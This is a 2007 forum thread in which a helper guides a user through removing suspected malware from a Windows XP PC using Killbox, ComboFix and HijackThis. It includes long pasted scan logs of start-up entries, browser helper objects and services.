O23 - Service: SNMP Trap Service (SNMPTRAP) - Unknown owner - C:\WINDOWS\system32\snmptrap.exe (file missing)

 

Six applications come back within seconds after being dragged to the recycle bin. They are:

bckgzm.exe
chkrzm.exe
hrtzzm.exe
rvsezm.exe
shvlzm.exe
zclientm.exe

Eighteen .dll files listed as application extensions also return. All files are in the Gaming Zone Windows' subdirectory.

If this is normal, no prob. I've just never seen files reappear in a file folder after they've been deleted like that, and I'm kind of desperate to fix this problem. I'm grasping at any straw that seemingly looks weird in order to provide you guys with as much information as I can. I don't know where else to look.

 

Ok, looks as tho all those files which keep coming back are directly related to the MSN gaming zone.

To remove the entire Gaming Zone, try this:
Go to control panel-->Select 'Add /Remove programs'---->then on left hand side select 'Add/Remove windows components', then click 'accessories and utilities'---> then details---->then games---->then details---> and uncheck all internet games. See if that eliminates them.

We still have some files to remove tho, aside from those.

Run Killbox again and insert the following for deletion:
C:\Program Files\Enigma Software Group
C:\Temp
C:\WINDOWS\okmbdnrA.exe
C:\WINDOWS\system32\TQ0
C:\WINDOWS\system32\T9
C:\WINDOWS\system32\T7
C:\WINDOWS\system32\T1QaSQ

Reboot is ok, run HJT and fix this line:
O2 - BHO: (no name) - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - (no file)

Reboot and run ComboFix first, then HJT and post both logs back into this thread.

 

MSN Gaming Zone is now cleared, but it looks like my browser and a bunch of other apps went with it LOL. No biggie; I know I can reload those.

"O2 - BHO: (no name)..." keeps coming back, however, as does the peculiar start-up sequence and replacement of desktop wp and icons.

Here are the logs:


"Owner" - 2007-06-07 9:40:00 Service Pack 2 NTFS
ComboFix 07-06-3 - Running from: "C:\Documents and Settings\All Users\Documents\ "


((((((((((((((((((((((((( Files Created from 2007-05-07 to 2007-06-07 )))))))))))))))))))))))))))))))


2007-06-06 19:00 <DIR> d-------- C:\!KillBox
2007-06-04 17:15 49,152 --a------ C:\WINDOWS\nircmd.exe
2007-06-04 13:31 10,872 --a------ C:\WINDOWS\system32\drivers\AvgAsCln.sys
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\TQ0
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T9
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T7
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T6
2007-06-04 10:12 <DIR> d-------- C:\Program Files\myCleanerPC
2007-06-04 10:11 <DIR> d-------- C:\WINDOWS\system32\T1QaSQ


(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))

2007-06-06 19:30:19 -------- d-----w C:\Program Files\MSN Gaming Zone
2007-06-04 14:51:47 -------- d-----w C:\Program Files\Lavasoft Ad-aware
2007-06-04 14:12:36 -------- d-----w C:\Program Files\Messenger
2007-05-15 17:59:06 12,622 -c--a-w C:\WINDOWS\mozver.dat
2007-04-29 15:05:46 -------- d-----w C:\DOCUME~1\Owner\APPLIC~1\MailWasher
2007-03-15 16:23:16 497,496 ----a-w C:\WINDOWS\system32\XceedZip.dll
2007-03-15 16:19:58 526,184 ----a-w C:\WINDOWS\system32\XceedCry.dll


((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))


*Note* empty entries & legit default entries are not shown

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}=C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx [2001-03-02 22:02]
{5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897}=C:\Program Files\Yahoo!\Common\yiesrvc.dll [2005-05-26 11:38]
{65D886A2-7CA7-479B-BB95-14D1EFB7946A}=C:\Program Files\Yahoo!\Common\YIeTagBm.dll [2005-01-24 09:55]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nwiz "= "nwiz.exe" [2004-10-29 17:50 C:\WINDOWS\system32\nwiz.exe]
"CamMonitor "= "c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe" [2002-06-18 02:11]
"KBD "= "C:\HP\KBD\KBD.EXE" [2001-07-07 00:56]
"checktime "= "c:\program files\HPSelect\Frontend\ct.exe" [2002-01-26 16:05]
"StorageGuard "= "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" [2002-05-09 11:01]
"AlcxMonitor "= "ALCXMNTR.EXE" [2004-09-07 13:47 C:\WINDOWS\ALCXMNTR.EXE]
"QuickTime Task "= "C:\Program Files\QuickTime\qttask.exe" [2005-12-05 21:33]
"RemoteControl "= "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe" [2004-11-02 21:24]

[HKEY_CURRENT_USER\software\microsoft\internet explorer\desktop\components\0]
Source= C:\Program Files\MSN Gaming Zone\rtemehdofse.html
FriendlyName=

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8} "= "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll" [2007-05-30 08:29]

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost *netsvcs*


Contents of the 'Scheduled Tasks' folder
2007-06-07 13:36:25 C:\WINDOWS\tasks\Symantec NetDetect.job

**************************************************************************

catchme 0.3.692 W2K/XP/Vista - userland rootkit detector by Gmer, http://www.gmer.net
Rootkit scan 2007-06-07 09:42:49
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

**************************************************************************

Completion time: 2007-06-07 9:44:02
C:\ComboFix-quarantined-files.txt ... 2007-06-07 09:43
C:\ComboFix2.txt ... 2007-06-06 19:21
C:\ComboFix3.txt ... 2007-06-06 16:18

--- E O F ---



Logfile of HijackThis v1.99.1
Scan saved at 9:44:45 AM, on 6/7/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\XiMeta\NetDisk\LDServ.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\XiMeta\NetDisk\Admin.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\explorer.exe
C:\Program Files\HijackThis\jakers.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.comcast.net
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
N3 - Netscape 7: user_pref( "browser.startup.homepage ", "http://www.google.com/ "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
N3 - Netscape 7: user_pref( "browser.search.defaultengine ", "engine://C%3A%5CProgram%20Files%5CNetscape%5CNetscape%5Csearchplugins%5CSBWeb_02.src "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: UberButton Class - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: YahooTaggedBM Class - {65D886A2-7CA7-479B-BB95-14D1EFB7946A} - C:\Program Files\Yahoo!\Common\YIeTagBm.dll
O2 - BHO: (no name) - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - (no file)
O3 - Toolbar: hp toolkit - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - C:\HP\EXPLOREBAR\HPTOOLKT.DLL
O3 - Toolbar: &NetDisk Tools - {6BB8F8F1-EFD5-45A0-87BA-74A0E7AFD10B} - C:\Program Files\XiMeta\NetDisk\Drivers\NDExpTool.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [CamMonitor] c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [checktime] c:\program files\HPSelect\Frontend\ct.exe
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [AlcxMonitor] ALCXMNTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe "
O4 - Global Startup: NetDisk Administrator.lnk = C:\Program Files\XiMeta\NetDisk\Admin.exe
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra 'Tools' menuitem: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.comcast.net
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://apple.speedera.net/qtinstall.info.apple.com/borris/us/win/QuickTimeInstaller.exe
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NetDisk Service (NetDisk_Service) - Unknown owner - C:\Program Files\XiMeta\NetDisk\LDServ.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: OKI OPHD DCS Loader - Oki Data Corporation - C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\OPHDLDCS.EXE
O23 - Service: SNMP Trap Service (SNMPTRAP) - Unknown owner - C:\WINDOWS\system32\snmptrap.exe (file missing)

 

Browser? What browser?

What other apps?

Weird.

These below may need to be manually removed, I'm thinking KillBox can't 'see' them.
C:\WINDOWS\system32\TQ0
C:\WINDOWS\system32\T9
C:\WINDOWS\system32\T7
C:\WINDOWS\system32\T6
C:\WINDOWS\system32\T1QaSQ

Let me know if you have any problems getting those.

 

IE and everything else that wasn't checked. I only wanted to uninstall the games directory, so I left that one checked and unchecked everything else, which had the opposite result. D'OH!!! Stupid, I know. I use Netscape anyway, so it's not impacting me at the moment.

I manually deleted those directories that KillBox couldn't see. I ran HJT and then re-booted. Interestingly, all of the problems still exist on start-up (generic splash screen, etc.) but the "02" line item fixed in HJT did not reappear. After running ComboFix however, it came back.

Weird.

There are six newly updated files in the system32 sub directory that might mean something to you guys. Here they are:

wpa.dbl
nvapps.xml
mapisvc.inf
perfc009.dat
perfh009.dat
PerfStringBackup.INI

"wpa.dbl" has a file date and time concurrent with the last reboot. The other five are dated today, but are from reboots a few hours ago.

Here are the most recent logs from CF and HJT:



"Owner" - 2007-06-07 14:25:28 Service Pack 2 NTFS
ComboFix 07-06-3 - Running from: "C:\Documents and Settings\All Users\Documents\ "


((((((((((((((((((((((((( Files Created from 2007-05-07 to 2007-06-07 )))))))))))))))))))))))))))))))


2007-06-06 19:00 <DIR> d-------- C:\!KillBox
2007-06-04 17:15 49,152 --a------ C:\WINDOWS\nircmd.exe
2007-06-04 13:31 10,872 --a------ C:\WINDOWS\system32\drivers\AvgAsCln.sys
2007-06-04 10:12 <DIR> d-------- C:\Program Files\myCleanerPC


(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))

2007-06-06 19:30:19 -------- d-----w C:\Program Files\MSN Gaming Zone
2007-06-04 14:51:47 -------- d-----w C:\Program Files\Lavasoft Ad-aware
2007-06-04 14:12:36 -------- d-----w C:\Program Files\Messenger
2007-05-15 17:59:06 12,622 -c--a-w C:\WINDOWS\mozver.dat
2007-04-29 15:05:46 -------- d-----w C:\DOCUME~1\Owner\APPLIC~1\MailWasher
2007-03-15 16:23:16 497,496 ----a-w C:\WINDOWS\system32\XceedZip.dll
2007-03-15 16:19:58 526,184 ----a-w C:\WINDOWS\system32\XceedCry.dll


((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))


*Note* empty entries & legit default entries are not shown

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}=C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx [2001-03-02 22:02]
{5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897}=C:\Program Files\Yahoo!\Common\yiesrvc.dll [2005-05-26 11:38]
{65D886A2-7CA7-479B-BB95-14D1EFB7946A}=C:\Program Files\Yahoo!\Common\YIeTagBm.dll [2005-01-24 09:55]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nwiz "= "nwiz.exe" [2004-10-29 17:50 C:\WINDOWS\system32\nwiz.exe]
"CamMonitor "= "c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe" [2002-06-18 02:11]
"KBD "= "C:\HP\KBD\KBD.EXE" [2001-07-07 00:56]
"checktime "= "c:\program files\HPSelect\Frontend\ct.exe" [2002-01-26 16:05]
"StorageGuard "= "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" [2002-05-09 11:01]
"AlcxMonitor "= "ALCXMNTR.EXE" [2004-09-07 13:47 C:\WINDOWS\ALCXMNTR.EXE]
"QuickTime Task "= "C:\Program Files\QuickTime\qttask.exe" [2005-12-05 21:33]
"RemoteControl "= "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe" [2004-11-02 21:24]

[HKEY_CURRENT_USER\software\microsoft\internet explorer\desktop\components\0]
Source= C:\Program Files\MSN Gaming Zone\rtemehdofse.html
FriendlyName=

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8} "= "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll" [2007-05-30 08:29]

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost *netsvcs*


Contents of the 'Scheduled Tasks' folder
2007-06-07 18:26:00 C:\WINDOWS\tasks\Symantec NetDetect.job

**************************************************************************

catchme 0.3.692 W2K/XP/Vista - userland rootkit detector by Gmer, http://www.gmer.net
Rootkit scan 2007-06-07 14:28:23
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

**************************************************************************

Completion time: 2007-06-07 14:29:35
C:\ComboFix-quarantined-files.txt ... 2007-06-07 14:29
C:\ComboFix2.txt ... 2007-06-07 14:17
C:\ComboFix3.txt ... 2007-06-07 09:44

--- E O F ---


Logfile of HijackThis v1.99.1
Scan saved at 2:30:00 PM, on 6/7/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\XiMeta\NetDisk\Admin.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\XiMeta\NetDisk\LDServ.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\explorer.exe
C:\Program Files\HijackThis\jakers.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.comcast.net
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
N3 - Netscape 7: user_pref( "browser.startup.homepage ", "http://www.google.com/ "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
N3 - Netscape 7: user_pref( "browser.search.defaultengine ", "engine://C%3A%5CProgram%20Files%5CNetscape%5CNetscape%5Csearchplugins%5CSBWeb_02.src "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: UberButton Class - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: YahooTaggedBM Class - {65D886A2-7CA7-479B-BB95-14D1EFB7946A} - C:\Program Files\Yahoo!\Common\YIeTagBm.dll
O2 - BHO: (no name) - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - (no file)
O3 - Toolbar: hp toolkit - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - C:\HP\EXPLOREBAR\HPTOOLKT.DLL
O3 - Toolbar: &NetDisk Tools - {6BB8F8F1-EFD5-45A0-87BA-74A0E7AFD10B} - C:\Program Files\XiMeta\NetDisk\Drivers\NDExpTool.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [CamMonitor] c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [checktime] c:\program files\HPSelect\Frontend\ct.exe
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [AlcxMonitor] ALCXMNTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe "
O4 - Global Startup: NetDisk Administrator.lnk = C:\Program Files\XiMeta\NetDisk\Admin.exe
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra 'Tools' menuitem: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.comcast.net
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://apple.speedera.net/qtinstall.info.apple.com/borris/us/win/QuickTimeInstaller.exe
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NetDisk Service (NetDisk_Service) - Unknown owner - C:\Program Files\XiMeta\NetDisk\LDServ.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: OKI OPHD DCS Loader - Oki Data Corporation - C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\OPHDLDCS.EXE
O23 - Service: SNMP Trap Service (SNMPTRAP) - Unknown owner - C:\WINDOWS\system32\snmptrap.exe (file missing)